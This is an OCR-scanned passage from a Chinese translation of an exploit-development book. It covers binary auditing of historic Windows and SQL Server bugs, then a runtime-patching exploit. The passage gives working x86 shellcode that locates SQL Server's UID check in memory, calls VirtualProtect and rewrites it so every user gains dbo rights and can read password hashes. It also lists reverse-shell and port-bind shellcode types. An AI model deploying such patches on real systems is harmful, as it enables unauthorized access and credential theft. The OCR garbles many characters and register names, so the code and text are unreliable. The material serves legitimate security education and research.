构成 员 或 大 部 分 结构 置 零 。 析 构 函 数 通常 释放 多 个 结构 成 员 。 

HalverFlake 写 了 一 个 非常 棒 的 IDAPro 播 件 (OBJRec), 可 以 把 我 们 从 乏味 的 手工 枚 举 对 象 结构 
成 员 的 工作 中 解脱 出 来 。 这 个 工具 可 从 www.openrce.org/downloads/details/39/OBJRec_for x86 下 载 。 


21.4.1 vtables 


当 审 计 二 进 制 文件 时 ， 如 果 编 译 器 使 用 了 vtables (virtual function tables， 虚 拟 函 数 表 )， 将 
会 给 我 们 带 来 很 多 麻烦 。 程 序 从 vtables 里 调用 函数 时 ， 如 果 不 结合 运行 时 分 析 ， 我 们 很 难 知道 
程序 到 底 调用 了 哪个 地 址 。 例 如 ， 在 编译 后 的 C++ 程序 里 通常 可 以 看 到 如 下 的 代码 段 。 


mov eax, [esi] 

lea ecx, [ebp-var. 8] 
push ebx 

push ecx 

mov ecx, esi 

push [ebp+arg 01] 
push Iebp*var 4] 


call dword ptr [eax+24h] 

在 这 个 例子 里 ，ESsI 包 含 对 象 指针 ， 从 它 的 vtables 调 用 一 些 函 数 指针 。 为 了 发 现 函 数 调用 
最 终 的 去 向 ， 我 们 还 需要 了 解 vtables 的 结构 。 一 般 可 以 在 类 的 构造 函数 里 发 现 这 个 结构 。 在 这 
个 例子 里 ， 我 们 在 构造 函数 里 发 现 了 如 下 的 代码 。 
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mov dword ptr [esi], offset vtable 
对 这 个 特殊 的 例子 ， 可 以 很 容易 地 在 vtable 里 定位 函数 调用 ， 但 是 如 果 我 们 想 在 嵌 套 对 象 
的 vtable 里 定位 函数 指针 的 调用 ， 就 需要 花费 很 多 时 间 了 。 


21.4.2 "BE ELS FH BOE 

这 里 提 到 的 知识 点 是 相当 明显 且 十 分 有 用 的 ， 如 果 你 还 不 知道 它们 ， 那 你 在 审计 二 进 制 时 ， 
可 能 会 错过 一 些 关键 点 。 

OQ 函数 调用 的 返回 值 通常 保存 在 EAX 寄 存 器 里 。 

O 有 符号 数 比 较 时 用 JL/JG 跳 转 指 令 。 

a 无 符号 数 比 较 时 用 JB/JA 跳 转 指令 。 

O MOVSX 对 目的 寄存 器 进行 符号 扩展 ，Movzx 对 目的 寄存 器 进行 零 扩展 。 


21.5 手动 二 进 制 分 析 


时 间 证 明 ， 要 在 二 进 制 中 定位 漏洞 ， 手 工 阅读 反 汇 编 代 码 依旧 是 非常 有 效 的 方法 。 当 手工 审 
计 二 进 制 时 ， 根 据 代码 质量 ， 审 计 者 可 能 要 采取 不 同 的 策略 。 
21.5.1 快速 检查 函数 库 调 用 

如 果 代码 质量 很 差 ， 寻找 简单 的 编程 错误 就 可 能 会 发 现 很 多 问题 ， 当 然 ， 如今 这 种 情形 一 般 
只 在 不 公开 源码 的 软件 里 出 现 。 如 果 希 望 快速 找 出 错误 ,首先 应 该 检查 那些 一 直 容 易 出 问题 的 库 
函数 调用 。 

经 常 存在 问题 的 函数 有 很 多 ， 比 如 说 strcpy、strcat、sprintf， 以 及 它们 派生 的 函数 ， 
这 些 都 应 该 仔细 检查 。Windows 中 还 有 许多 上 述 函 数 的 变 体 , 包括 宽 字符 集 和 ASCH 字 符 集 版 本 。 
例如 ， 类 似 strcpy 的 函数 就 可 能 包括 strcpy、 lstrcpyA. lstrcpyW. wcscpy 和 类 似 功能 的 自 
定义 函数 。 

MultiByteToWideChar 是 另 一 个 常见 的 容易 引入 Windows 问 题 的 函数 。 这 个 函数 的 第 6 个 参 
数 是 宽 字 符 目的 缓冲 区 的 大 小 。 然 而 ， 这 个 大 小 由 宽 字 符 的 字符 数 指定 ， 而 不 是 缓冲 区 的 总 量 。 
在 过 去 ， 曾 出 过 一 个 普通 的 编程 错误 一 一 把 sizeof () 的 值 作为 函数 的 第 6 个 参数 ， 但 是 因为 每 个 
宽 字 符 的 长 度 是 2B, 所 以 导致 以 双 倍 的 目的 缓冲 区 长 度 来 写 目 的 缓冲 区 。 这 个 错误 曾经 导致 微软 
的 IIS Web 服 务 器 出 现 安全 漏洞 。 


21.5.2 可疑 的 循环 和 写 指令 

当 寻 找 简 单 的 API 调 用 未 能 发 现 明显 的 安全 漏洞 时 ， 是 真正 开始 二 进 制 审计 的 时 候 了 。 同 其 
他 形式 的 审计 类 似 ， 二 进 制 审计 包括 理解 目标 程序 和 阅读 相关 的 代码 段 。 如 果 目 标 程 序 有 明显 的 
审计 起 点 ， 例 如 处 理 不 可 信 的 攻击 者 定义 的 数据 的 例 程 ， 那 么 就 可 以 从 这 里 开始 。 如 果 没 有 这 样 
的 起 点 ， 可 以 寻找 与 特定 协议 相关 的 信息 ， 这 样 也 有 可 能 发 现 好 的 起 点 。 例 如 ，Web 服 务 器 在 分 
析 进 入 的 请 求 时 ， 很 可 能 以 分 析 请 求 的 方法 来 开始 ， 那 么 ， 搜 索 普 通 请 求 方法 的 二 进 制 代码 可 能 
是 找到 起 点 的 好 方法 。 
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一 些 常见 的 代码 构造 可 能 包含 危险 代码 ， 从 而 导致 缓冲 区 溢出 。 如 下 面 的 例子 所 示 。 
把 索引 变量 写 入 字符 数组 : 

mov [ecxtedx], al 

把 索引 变量 写 入 局 部 栈 缓冲 区 : 

mov [ebptecx-100h], al 


把 索引 变量 写 到 指针 ， 接 着 递增 指针 : 


mov [edx], ax 
inc edx 
inc edx 


对 来 自 攻 击 者 控制 缓冲 区 的 内 容 进 行 符号 扩展 ; 
mov cl, [edx] 
movsx eax, cl 


对 包含 攻击 者 控制 数据 的 寄存 器 进行 加 / 减 运算 (通常 会 导致 整数 溢出 ); 
mov eax, [edi] 

add eax, 2 

cp eax, 256 

jae error 


由 于 作为 16 或 8 位 整数 保存 ， 从 而 导致 值 截断 : 


push edi 

cali strlen 

add esp, 4 

mov word ptr [ebp-4], ax 


通过 识别 这 类 代码 构造 ， 就 有 可 能 在 二 进 制 里 发 现 大 范围 的 内 存 恶 化 漏洞 。 
21.5.3 ”高 层 理解 和 逻辑 错误 

尽管 现在 发 现 的 大 多 数 漏 洞 都 是 内 存 恶 化 问题 , 但 程序 里 某 些 错误 和 内 存 恶 化 却 完全 没有 关 
系 ， 它 们 只 是 简单 的 逻辑 缺陷 。 一 个 典型 的 例子 是 几 年 前 发 现 的 ISS 双 解码 漏洞 。 大 家 一 致 认为 
很 难 通过 二 进 制 分 析 来 发 现 这 类 漏洞 ， 发 现 它们 既 要 有 好 的 运气 ， 也 需要 深入 理解 目标 程序 。 很 
明显 ， 发 现 这 类 错误 没有 有 效 的 方法 ， 但 通常 来 说 ， 寻 找 这 类 问题 的 最 好 方法 是 ; 仔细 检查 任何 
访问 基于 用 户 提交 的 关键 性 资源 的 代码 。 寻 找 这 类 问题 需要 拥有 创造 性 及 开放 的 心态 ， 并 投入 很 
多 时 间 。 
21.5.4 二进制 的 图 形 化 分 析 

有 些 函 数 ， 特 别 是 那些 非常 长 或 复杂 的 函数 ， 以 图 形 的 形式 显示 会 更 有 意义 。 一 图 胜 千 言 ， 
某 些 复杂 的 循环 结构 一 旦 用 图 表示 就 会 变 得 清晰 许多 ; 把 它们 作为 一 幅 大 图 来 查看 要 比 阅读 线性 
的 反 汇编 代码 好 得 多 ， 而 且 很 容易 区 分 代码 段 。IDA Pro 可 以 为 任何 给 定 的 函数 生成 图 ， 每 个 节 
点 代表 一 段 连续 的 代码 。 节 点 由 分 支 或 执行 流连 接 ，IDA Pro 保 证 每 个 节点 都 是 连续 执行 的 代码 
块 。 但 很 多 时 候 ， 生 成 的 图 很 大 ， 很 难 在 显示 器 里 看 清 它 的 全 瑶 。 因 此 最 好 把 它们 打印 出 来 ( 通 
常会 有 好 几 页 )， 然 后 在 纸 上 分 析 。 
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然而 ，IDA Pro 的 图 形 引擎 可 能 会 曲解 某 些 编译 器 生成 的 代码 。 例 如 ， 它 生成 的 函数 图 就 不 
包括 MSVC++ 生 成 的 代码 段 。 这 种 曲解 可 能 导致 图 形 不 完整 ， 甚至 完全 不 可 用 。 因 此 , Halvar Flake 
为 IDA Pro 设 计 了 一 个 图 形 化 的 插件 ， 这 个 插件 生成 的 图 形 包括 MSVC++ 编 译 的 代码 ， 从 而 生成 
完整 有 用 的 图 形 。 


21.5.5 ”手动 反 编译 

一 些 函数 太 大 了 , 很 难 用 反 汇 编 的 方式 进行 分 析 。 而 且 , 某 些 函数 包含 非常 复杂 的 循环 构造 ， 
通过 传统 的 二 进 制 分析 方 法 很 难 确定 它 的 安全 性 。 在 这 种 情况 下 可 以 选择 手动 反 编译 ， 

经 过 正确 反 编译 之 后 的 代码 明显 比 反 汇编 后 的 代码 更 易于 审计 , 但 前 提 是 , 必须 保证 进行 了 
正确 的 反 编译 。 在 审计 反 编译 的 过 程 中 会 有 少许 误区 。 完 全 撒 开 安 全 审计 中 的 习惯 (如 果 有 可 能 ) 
并 生成 函数 的 源码 表示 ， 对 我 们 来 说 是 很 有 帮助 的 。 那 样 一 来 ， 反 编译 就 不 太 可 能 被 一 些 想当然 
HILATS T o 


21.6 二进制 漏洞 例子 
让 我 们 看 一 些 具体 的 例子 ， 通 过 二 进 制 分 析 来 搜索 安全 漏洞。 
21.6.1 微软 SQL Server 错误 


本 书 的 作者 David Litchfield 和 Dave Aitel 在 微软 的 SQL Server 里 发 现 了 许多 严重 漏洞 。Slammer 
蠕虫 就 是 利用 了 他 们 发 现 的 SQL Server 的 漏洞 ， 对 网 络 安全 产生 了 严重 影响 。 快 速 检查 未 打 补 丁 
的 SQL Server 网 络 库 函数 的 核心 网 络 服务 就 能 发 现 这 些 错误 的 根源 。 

Litchfield 在 SQL 解决 方案 服务 的 包 处 理 例 程 里 发 现 的 漏洞 是 未 检查 sprintf 调 用 导致 的 。 


mov edx, [ebp+var_24C8] 

push edx 

push offset aSoftwareMic_17 ; "SOFTWARE\ \Microsoft\\Microsoft SQL Server"... 
push offset aSSMssqlserverc ; "$s%s\\MSSOLServer \\CurrentVersion" 

lea eax, [ebp+var_84] 

push eax 

call ds:sprintf 

add esp, 10h 


在 这 个 例子 里 ， var_24C8 包 含 的 是 刚刚 读 入 的 接近 1024B 的 网 络 包 数据 ， 而 var_84 是 一 个 
128B 的 局 部 栈 缓 冲 区 ， 操 作 结 果 很 明显 ， 尤 其 是 在 检查 二 进 制 时 更 加 明显 。 
Dave Aitel 发 现 的 SQL Server Hello 漏 洞 也 是 未 检查 字符 串 操 作 导 致 的 ， 在 这 个 例子 里 是 strcpy。 


mov eax, [ebp*arg 4] 
add eax, [ebp+var 218] 
push eax 

lea ecx, [ebp-var, 214] 
push ecx 

call strcpy 


add esp, 8 
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目的 缓冲 区 var_214 是 一 个 512B 的 局 部 栈 缓冲 区 ， 源 字符 串 只 是 包 数 据 。 再 次 强调 ， 在 那些 
广泛 使 用 的 、 只 有 二 进 制 代码 的 软件 里 ， 越 简单 的 错误 潜伏 的 时 间 可 能 会 越 长 。 


21.6.2 LSD 的 RPC-DCOM 漏洞 


这 个 声名 狼藉 并 广 被 利用 的 漏洞 由 The Last Stages of Delirium (LSD) 在 RPC-DCOM 接 口 里 
发 现 ， 这 个 漏洞 是 程序 解析 缺少 UNc 路 径 名 的 服务 器 名 时 ， 没 有 检查 字符 串 副 本 循环 导致 的 。 当 
再 次 定位 rpcss .ql1 的 时 候 就 会 发 现 ， 这 个 内 存 副本 循环 分 明 是 一 个 非常 明显 的 安全 风险 。 


mov ax, [eax+4] 

emp ax, '\' 

jz short loc 761AE698 
sub edx, ecx 

loc, 761AE689: 

mov [ecx], ax 

inc ecx 

inc ecx 

mov ax, [ecx+edx] 

cmp ax, '\' 

jnz short loc 761AE689 


这 里 的 UNc 路 径 名 使 用 \\server\share\path 的 格式 ， 作 为 宽 字符 串 来 转换 。 上 面 的 循环 跳 
过 开始 的 4 字 节 《〈 两 个 反 斜 本)， 把 数据 循环 复制 到 目的 缓冲 区 ， 直 到 碰 到 终止 反 斜 杠 为 止 。 在 整 
个 过 程 中 ， 没 有 做 任何 边界 检查 。 像 这 样 的 循环 构造 是 内 存 恶 化 漏洞 的 常见 根源 。 

21.6.3 IIS WebDav 漏洞 

微软 Security Bulletin MS03-007 公 开 的 HS WebDav 漏 洞 是 比较 罕见 的 ， 其 中 的 0day 漏 润 不 是 
由 微软 员工 发 现 的 ， 微 软 为 它 发 布 了 补丁 。 据 猜测 ， 这 个 漏洞 不 是 由 安全 研究 者 发 现 的 ， 而 是 由 
怀 有 恶意 企图 的 第 三 者 发 现 的 。 

这 个 真正 的 漏洞 是 16 位 整数 重 台 (wrap) 的 结果 ， 通 常 发 生 在 Windows 核 心 运行 时 函数 库 的 
字符 串 函 数 中 。 这 些 函 数 使 用 的 数据 存储 类 型 ， 如 RtliInitUnicodeSstring 和 RtlInitAnsi- 
String， 有 一 个 16 位 无 符号 数 的 长 度 字段 。 如 果 传 给 这 些 函 数 的 字符 串 超 过 65 535 个 字符 ， 长 度 
FRHES, SBMA BIRR). RAIS WebDav 漏 洞 是 传递 长 度 超过 64KB 的 字符 串 给 
RE1DosPathNameToNtPathName_U 的 结果 ， 导 致 Unicode 字 符 串 的 长 度 字段 重 肆 ， 从 而 使 非常 大 
的 字符 串 有 非常 小 的 长 度 字段 。 这 个 独特 的 错误 非常 巧妙 ， 通 过 二 进 制 审 计 几 乎 不 可 能 发 现 它 ， 
不 过 ， 殷 着 铁 棒 磨 成 针 的 态度 ， 可 能 会 发 现 这 类 问题 。 

Unicode 或 ANSI 字 符 串 的 基本 数据 结构 如 下 。 

typedef struct UNICODE_STRING { 

unsigned short length; 
unsigned short maximum_length; 
wchar *data; 


}; 
RtlInitunicodeString 里 的 代码 如 下 。 
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mov edi, [esp+arg_4] 
mov edx, [esp+arg_0] 
mov dword ptr [edx], 0 
mov fedx+4], edi 

or edi, edi 

jz short loc, 77F83Gq98 
or ecx, OFFFFFFFFh 
xor eax, eax 


repne Scasw 


not ecx 

shi ecx, 1 

mov [edx+2], cx // possible truncation here 
dec ecx 

dec ecx 

mov [edx], cx // possible truncation here 


在 这 个 例子 里 ， 宽 字符 串 长 度 等 于 repne scasw 乘 以 2， 保 存在 16 位 的 结构 字段 里 。 
从 被 Rt1DosPathNameToNtPathName._U 调 用 的 函数 里 ， 可 以 发 现 如 下 代码 


mov dx, [ebp+var_30] 
movzx esi, dx 

mov eax, [ebp+var 28] 
lea ecx, [eax-*esi] 
mov [ebp*var 5C], ecx 


cmp ecx, [ebp-«arg 4] 
jnb loc 77F8ET771 
在 这 个 例子 里 ，var_28 是 男 外 的 字符 串 长 度 ，var_30 是 攻击 者 的 长 UNICODE_STRING 结 构 ， 


有 截断 的 16 位 长 度 值 。 如 果 两 个 字符 串 的 总 长 度 小 于 arg_4《〈 目 的 栈 缓冲 区 的 长 度 )， 那 么 这 两 
个 字符 串 被 复制 到 目的 缓冲 区 。 因 为 其 中 的 一 个 字符 串 比 保留 的 栈 空间 大 很 多 ， 因 此 发 生 溢出 。 
副本 字符 的 循环 相当 标准 ， 很 好 辨认 ， 如 下 所 示 。 


mov [ecx], dx 

add ecx, ebx 

mov [ebp+var_34], ecx 
add [ebp+var_60], ebx 

loc_77F8AE6E: 

mov edx, [ebp+var_60] 

mov dx, [edx] 

test dx, dx 

jz short loc 77FBAE42 
cmp dx, ax 

jz short loc 77F8AE42 
cmp dx, '/' 

jz short loc 77F8AE42 
cmp dx, '.' 

jnz short loc 77F8AE63 
jmp loc 77F8B27F 


在 这 个 例子 里 ， 字 符 串 被 复制 到 目的 缓冲 区 ， 直 到 碰 到 点 〈.)、 正 斜 杠 〈/) 或 空 字 节 。 尽 管 
这 个 独特 的 漏洞 导致 写 入 的 数据 超出 栈 顶 ， 从 而 终止 线程 ， 但 也 改写 了 SEH 异 常 处 理 指针 ， 从 而 
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可 以 执行 任意 的 代码 。 
21.7 小结 


我 们 发 现 , 在 缺乏 源码 的 软件 里 发 现 的 许多 漏洞 ， 早 在 几 年 前 就 从 开源 软件 里 消失 了 。 因 为 
二 进 制 审计 本 身 就 有 技术 壁垒 ,而且 绝 大 部 分 没有 公开 源码 的 软件 被 审计 的 力度 很 小 ,或 者 仅 做 
了 模糊 测试 ， 从 而 遗留 了 很 多 不 引 人 注 意 的 错误 。 虽 然 二 进 制 审 计 需 要 一 些 技术 ， 但 不 会 比 源码 
审计 难 到 哪儿 去 ， 只 是 需要 更 多 的 时 间 。 随 着 时 间 流 逝 ， 许 多 明显 的 漏洞 会 因 模糊 测试 而 在 商业 
软件 中 绝迹 。 为 了 寻找 更 复杂 的 错误 ， 审 计 者 必须 做 更 多 更 深入 的 二 进 制 分 析 。 最 终 ， 二 进 制 审 
计 可 能 会 变 得 像 阅读 源码 一 样 稀 松 平常 ， 这 是 一 定 的 ， 但 目前 仍 有 许多 工作 需要 我 们 去 做 。 
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A: eae pens ERA, 我 们 也 会 介绍 高 级 shellcode 编 程 技术 ， 例如 

运程 访问 控制 ， 生 成 在 实际 环境 中 运行 的 破解 代码 ,而 不 仅 仪 是 在 实验 室 环 境 
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“使 你 的 破解 代码 可 以 在 任何 实际 环境 中 运行 。 接 下 来 ， 在 第 24 章 ， 我 们 将 

ande. BHORINQE, 现在 的 数据 库 都 放 在 一 合计 算 机 上 ， 意味 着 数据 ; 


危险 。 
K E. 在 第 25 章 和 第 26 章 ， 我 们 将 介绍 怎样 在 OpenBSD 和 Solaris 操 作 系 里 发 现 
些 内 核 漏洞 ， 并 查看 一 些 新 现象 及 内 核 剖 析 ， aie a 内 核 bu 
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在 和 
O UNIX 
mexecve /bin/sh 
m 端口 绑 定 /bin/sh 
被动 连 接 ( 反 向 shell) /bin/sh 
m setuid 
a 破解 chroot 
Q Windows 
W WinExec 
m HiCreateProcess cmd.exe 反 向 shell 
这 些 包 括 基 本 的 、 基 于 shell 类 型 的 破解 代码 ， 这 些 代码 被 频繁 贴 到 邮件 列表 和 大 多 数 安全 
Web 站 点 上 。 虽 然 存 在 许多 与 这 种 传统 shellcode 开 发 相关 的 复杂 问题 ， 但 你 有 了 时 会 发 现 你 想 做 的 
超出 了 传统 shellcode 的 范围 ， 这 或 许 是 因为 有 更 直接 的 方法 可 以 完成 你 的 目标 ， 或 者 是 因为 目标 
系统 已 经 有 了 针对 传统 shellcode 的 防御 措施 ,或许 仅仅 是 因为 你 喜欢 更 有 趣 或 更 上 涩 的 方法 而 已 。 
因此 ， 本 章 不 介绍 传统 的 shellcode， 而 是 把 精力 放 在 目标 进程 中 执行 的 任意 代码 所 做 的 更 巧 
妙 的 或 不 寻常 的 事情 上 , 例如 , 修改 正在 运行 的 进程 的 代码 , 直接 在 系统 中 增加 用 户 或 更 改 配置 ， 
或 者 用 隐蔽 通道 从 目标 主机 传输 数据 。 如 果 本 书 是 包含 各 种 破解 的 动物 园 ， 那 么 本 章 中 介绍 的 就 
是 其 中 的 一 些 稀 有 动物 ， 如 海牛 、 土 肪 、 鸭 跨 兽 ， 其 至 还 有 鸭 龙 。 
我 们 也 会 介绍 一 些 常 见 的 shellcode 穿 门 和 技巧 ， 主 要 是 面向 Windows 平 台 的 ， 例 如 减 小 
shellcode 的 大 小 ， 与 SP 及 目标 系统 版 本 无 关 性 的 问题 等 。 


22.1 修改 程序 


如 果 目 标 程序 非常 复杂 , 削弱 它 的 安全 性 而 不 是 费心 尽力 地 返回 shell 可 能 会 更 好 一 些 。 例如， 
在 攻击 数据 库 服务 器 时 ， 攻 击 者 通常 困 在 大 量 的 数据 中 。 在 这 种 情况 下 ，shell 对 攻击 者 来 说 可 能 
并 没什么 用 处 , 因为 相关 的 数据 可 能 隐藏 在 海量 的 数据 文件 里 的 某 个 地 方 , 有 些 可 能 无 法 访问 ( 
为 它们 被 数据 库 进程 排 它 性 地 锁定 了 )。 但 从 另 一 方面 说 ， 只 要 有 适当 的 权限 ， 利 用 SQL Query 
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就 能 轻松 提取 需要 的 数据 。 在 这 种 情形 下 ， 运 行 时 修补 破解 就 能 派 上 用 场 了 。 

在 “Violating Database—Enforced Security Mechanisms” (www.ngssoftware.com/papers/violat- 
ing database security.pdf) 这 篇 文章 里 ，Chris Anley 介 绍 了 针对 微软 SQL Server 数 据 库 系统 的 3B 
补丁 ， 它 可 以 把 每 一 个 用 户 的 权限 硬 编码 成 abo 一 一 数据 库 属 主 〈 数 据 库 的 root 账 号 )， 这 个 补 
丁 可 以 通过 普通 的 缓冲 区 溢出 或 格式 化 串 攻 击 交付 。 我 们 将 再 次 回顾 这 篇 文章 里 的 例子 ， 以 熟悉 

这 个 补丁 有 一 个 有 趣 的 属性 , 它 可 以 修补 内 存 中 运行 的 进程 , 就 像 修 补 磁盘 上 的 二 进 制 文件 
那样 ， 而 且 效 果 一 样 。 但 从 攻击 者 的 角度 来 说 ,修补 磁盘 上 的 二 进 制 文件 有 一 个 明显 的 缺点 ， 那 
就 是 修改 后 的 文件 很 可 能 会 被 检测 到 (通过 病毒 扫描 引擎 、TripWire 文 件 完整 性 机 制 等 )。 也 就 是 
说 ， 这 类 攻击 方法 很 有 用 ， 它 们 相 比 更 快速 、 基 于 网 络 的 攻击 来 说 ， 更 像 是 安装 了 一 个 经 得 起 考 
验 的 巧妙 的 后 门 。 
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我 们 的 目的 是 寻找 一 些 方法 , 禁止 数据 库 内 部 的 访问 控制 , 从 而 可 以 随意 访问 数据 库 中 的 内 容 。 

与 其 花 大 力气 静态 分 析 整 个 SQL Server 代 码 库 ， 还 不 如 做 一 些 简单 的 跟踪 调试 ， 这 可 能 会 ; 
我 们 指出 正确 的 方向 。 

首先 ， 需 要 以 我 们 希望 的 方式 实行 安全 例 行 测试 的 查询 。 如 果 用 户 不 是 系统 管理 员 ， 如 下 
查询 

select password from sysxlogins 
将 失败 。 因 此 ， 我 们 启动 Query Analyzer (SQL Server 自 带 的 工具 〉 和 调试 器 (MSVC++ 6.0)， 并 
再 次 以 低 权 限 用 户 的 身份 进行 查询 。 这 时 将 出 现 Microsoft Visual C++ Exception。 取 消 异 
常 消 息 框 后 ， 单 击 Debug/Go 让 SQL Server 处 理 这 个 异常 。 返 回 Query Analyzer， 可 以 看 到 以 下 错 
误 消息 。 


SELECT permission denied on object 'sysxlogins', database 'master', 





owner 'dbo'. 

奇怪 的 是 ， 当 我 们 以 sa 用 户 身份 进行 同样 的 查询 时 ， 并 没有 发 生 异 常 。 很 明显 ， 当 数据 库 
拒绝 用 户 访问 某 些 表 时 ， 数 据 库 的 访问 控制 机 制 触发 了 C++ 异常 。 利 用 这 一 点 可 以 大 大 简化 逆向 
分 析 过 程 。 

现在 ， 我 们 对 代码 进行 跟踪 分 析 ， 试 着 找 出 判断 并 触发 异常 的 代码 位 于 什么 地 方 。 这 是 一 个 
反复 试验 的 过 程 ， 几 次 失败 之 后 ， 可 以 看 到 如 下 内 容 : 


00416453 E8 03 FE 00 00 call FHasObjPermissions (0042625b) 
如 果 我 们 没有 权限 查询 ， 将 得 到 下 述 内 容 : 
00613D85 E8 AF 85 E5 FF cali ex raise (00460c339) 


注解 值得 一 提 的 是 ， 因为 微软 提供 了 sqlserver. pab 文 件 ， 所 以 我 们 可 以 看 到 有 关 的 符号 名 。 
这 实在 太 难 得 了 ! 
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显然 ，FHasObjPermissions 函 数 与 之 相关 ， 检 查 这 个 函数 ， 我 们 看 到 : 


004262BB E8 94 D7 FE FF call ExecutionContext::Uid (00413a54) 
004262C0 66 3D 01 00 cmp ax,offset FHasObjPermissions+0B7h 


(004262c2) 
004262C4 OF 85 AC OC 1F 00 jne FHasObjPermissions+0C7h (00616f76) 


这 等 价 于 : 

a 得 到 UID; 

a 把 UID 和 0x0001 做 比较 ; 

a 如 果 UID 不 等 于 0x0001,，( 在 一 些 其 他 的 检查 之 后 ) 跳 到 异常 处 理 程序 。 

这 意味 着 UID 1 具有 特殊 的 含义 。 用 以 下 代码 检查 sysusers 表 : 

select * from sysusers 
可 以 看 到 UID 1 是 dbo 一 一 数据 库 的 属 主 。 查 询 SQL Server 的 在 线 文 档 Chttp://doc.ddart.net/mssql/ 
sqI2000/html/setupsql/ad security 9qyh.htm)， 可 知 : 

dbo 是 数据 库 用 户 ， 可 以 在 数据 库 里 执行 所 有 的 操作 。 在 每 个 数据 库 内 ， 属 于 

sysadmin 内 建 服务 器 角色 ( fixed server role) 的 成 员 都 被 映射 为 这 个 特殊 的 用 户 一 一 dqbo。 

同样 ， 任 何 由 sysadmin 内 建 服务 器 角色 创建 的 对 象 都 自动 属于 dbo。 

显然 ， 如 果 我 们 想 成 为 UID 1， 一 个 小 小 的 补丁 就 能 轻松 搞定 。 

检查 ExecutionContext: :UID 人 代码， 我 们 发 现 默 认 的 代码 路 径 是 直接 的 。 


?Uid@ExecutionContext@@QAEFXZ: 





00413A54 56 push esi 

00413A55 8B F1 mov esi,ecx 

00413A57 8B 06 mov eax,dword ptr [esi] 

00413A59 8B 40 48 mov eax,dword ptr [eax-*48h] 

00413A5C 85 CO test eax,eax 

00413A5E OF 84 6E 59 24 00 je ExecutionContext::Uid«OCh (00659382) 
00413A64 8B OD 70 2B AO 00 mov ecx,dword ptr [ tls index (00a02b70) ] 
00413A6A 64 8B 15 2C 00 00 00 mov edx,dword ptr fs: [2Ch] 

00413A71 8B OC 8A mov ecx,dword ptr [edx+ecx*4] 

00413A74 39 71 08 cmp dword ptr [ecx*8],esi 

00413A77 OF 85 SB 59 24 00 jne ExecutionContext::Uid+2Ah (00659348) 
00413A7D F6 40 06 01 test byte ptr [eax+6],1 

00413A81 74 1A je ExecutionContext::Uid+3Bh (00413a9d) 
00413A83 8B 06 mov eax,dword ptr [esi] 

00413A85 8B 40 48 mov eax,dword ptr [eax+48h] 

00413A88 F6 40 06 01 test byte ptr [eax+6],1 

00413A8C OF 84 6A 59 24 00 je ExecutionContext::Uid«63h (006593fc) 
00413A92 8B 06 mov eax,dword ptr [esi] 

00413A94 8B 40 48 mov eax,dword ptr [eax*48h] 

00413A97 66 8B 40 02 mov ax,worà ptr [eax+2] 

00413A9B 5E pop esi 

00413A9C C3 ret 


有 意思 的 是 这 一 行 : 
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00413A97 66 8B 40 02 mov ax,word ptr [eax+2] 
这 行 代码 把 uTD 复 制 给 ax。 

总 结 一 下 ,我 们 在 FHasobjPermissions 里 发 现 调 用 函数 Exkecutioncontext : :UID 以 及 似乎 
对 硬 编码 的 UTD 1 执行 特殊 访问 的 代码 。 通 过 用 新 指令 


00413A97 66 8B 40 02 mov ax,word ptr [eax+2] 
(这 实际 上 是 mov ax,1) 替换 
00413A97 66 B8 01 00 mov ax,offset 


ExecutionContext::Uid+85h (00413a99) 


就 可 以 很 容易 地 修补 这 个 编码 ， 从 而 使 每 个 用 户 的 UID 都 是 1。 

测试 修改 后 的 有 效 性 ， 我 们 发 现 现在 任何 用 户 都 能 运行 

select password from sysxlogins 

骞 无 疑问 ,这 人 允许 每 个 人 访问 密码 散 列 ， 从 而 (通过 密码 破解 工具 ) 访问 数据 库 内 所 有 账户 
的 密码 。 

测试 对 其 他 表 的 访问 可 以 发 现 ， 现 在 可 以 以 任何 用 户 对 数据 库 内 的 任何 表 进 行 select、 
insert、update、qdelete 操 作 。 而 实现 这 一 壮举 ， 只 需 修补 3B 的 SQL Server 代 码 。 

既然 已 经 对 补丁 有 了 清楚 的 认识 ， 就 需要 创建 一 个 实现 修补 而 不 会 引起 错误 的 破解 。 在 SQL 
Server 里 有 许多 已 知 的 溢出 和 格式 化 串 错误 ， 本 章 不 会 深入 研究 这 些 问题 的 细节 。 不 过 ， 我 们 会 
对 与 编写 这 类 破解 有 关 的 问题 展开 讨论 。 

首先 ， 破 解 代码 不 能 简单 地 改写 内 存 中 的 代码 。Windows NT 对 内 存 页 应 用 访问 控制 ， 代 码 
页 一 般 标 为 PAGE_EXECUTE_READ， 修 改 代 码 的 尝试 将 引起 访问 违例 。 

用 VirtualProtect 函 数 可 以 很 容易 地 解决 这 个 问题 。 


ret = VirtualProtect( address, num_bytes_to_change, 
PAGE EXECUTE READWRITE, &old protection value ); 


破解 代码 只 需 调用 VirtualProtect 把 这 页 标 为 可 写 , .然后 在 内 存 里 修改 相应 的 字 节 。 
如 果 我 们 要 修补 的 字 节 驻 留 在 DLL 里 ， 它 们 在 内 存 里 可 能 以 动态 的 方式 被 重 定位 。 同 样 ， 打 
了 不 同 补丁 的 SQL Server 的 修补 目标 可 能 不 一 样 , 因此 , 破解 代码 应 试 着 在 内 存 里 搜索 这 个 字 节 ， 


而 不 是 直接 修补 绝对 地 址 。 
下 面 的 破解 代码 硬 编码 Windows 2000 Service Pack 2 中 的 地 址 ， 基 本 实现 了 前 面 描 述 的 功能 。 


这 个 代码 非常 简单 ， 仅 供 演 示 。 
mov ecx, 0xc35e0240 
mov edx, 0x8b664840 
mov eax, 0x00400000 

next: 

cmp eax, 0x00600000 
je end 
inc eax 
cmp dword ptr[eax], edx 
je found 
jmp next 





found: 
emp dword ptr[eax + 4], ecx 
je foundboth 
jmp next 

foundboth: 
mov ebx,eax ; Save eax 

; (virtualprotect then write) 

push esp 
push 0x40 ; PAGE EXECUTE READWRITE 
push 8 ; number of bytes to unprotect 
push eax ; Start address to unprotect 
mov eax, O0x77e8a6ec ; address of VirtualProtect 
call eax 
mov eax, ebx ; get the address back 
mov dword ptr[eax],0xb8664840 
mov dword ptr[eax-4],0xc35e0001 

end 


xor eax, eax 


call eax ; SQL Server handles the exception with no problem so 
; we don't need to worry about continuation of execution! 


22.3 MySQL 1 位 补丁 


我 们 再 看 另外 一 个 例子 (在 此 之 前 没有 公布 过 )， 它 也 用 到 了 上 节 所 讨论 的 技术 。 这 个 例子 
与 MySQL 有 关 ， 我 们 用 一 个 小 小 的 补丁 就 可 以 修改 它 的 远程 认证 机 制 ， 从 而 使 任何 密码 都 可 以 
